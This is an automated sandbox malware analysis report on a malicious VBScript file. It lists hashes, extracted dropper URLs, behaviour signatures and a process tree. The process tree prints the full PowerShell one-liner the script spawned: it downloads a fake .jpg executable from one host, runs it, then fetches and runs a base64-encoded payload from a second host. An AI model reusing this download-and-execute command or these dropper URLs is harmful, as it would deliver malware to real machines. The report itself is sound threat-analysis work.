Overview

overview

10

Static

static

1

Invio_File...97.vbs

windows7-x64

10

Invio_File...97.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2024 10:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Invio_File_5_2e1c05a00c25827239e33c13d5dfad97.vbs

  • Size

    2.0MB

  • MD5

    9f27498cc3e4c9551b2a09b80a695e20

  • SHA1

    7be68189f366989b40ddcbdb65a73e71af752755

  • SHA256

    a35d561f3a00760bb2da5329c72ca4e7d6c30a5f81c8bb2af508f4d468c86855

  • SHA512

    68858adb77479ffb7f9bd69869e5be06d7c7c8424e3e657b51d01afac61dc3af640a3fbce75d98d4413ff310ae214b90d65a6ae61ad9f15f036a542f4003c941

  • SSDEEP

    192:MVp2kmF6uwAS6X9OHrNRL7Qf8i9hwuH7+o4kXpyHHxi:M72kmF7wAOL/Qf8xTcXcxi

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://dbi.willjohnson.net/?need=5a5210f&vid=vb1&53969
exe.dropper

http://www.luigicafagna.it/wp-content/uploads/2017/10/SKMBT_C22017100712541.jpg

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Start PowerShell.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invio_File_5_2e1c05a00c25827239e33c13d5dfad97.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1244
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" try{ $a = $env:temp + '\122.jpg';((New-Object Net.WebClient).DownloadFile(('http://www.luigicafagna.it/wp-content/uploads/2017/10/SKMBT_C22017100712541.jpg'),$a));start-process $a;}catch{};iex ( [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( ((New-Object Net.WebClient).DownloadString('http://dbi.willjohnson.net/?need=5a5210f&vid=vb1&53969')))));acyww="bguvv";
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2116

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2116-4-0x000007FEF68AE000-0x000007FEF68AF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2116-5-0x000000001B720000-0x000000001BA02000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2116-6-0x0000000002340000-0x0000000002348000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2116-7-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2116-10-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2116-9-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2116-8-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2116-11-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2116-12-0x000007FEF68AE000-0x000007FEF68AF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2116-13-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2116-14-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

    Filesize

    9.6MB

    Download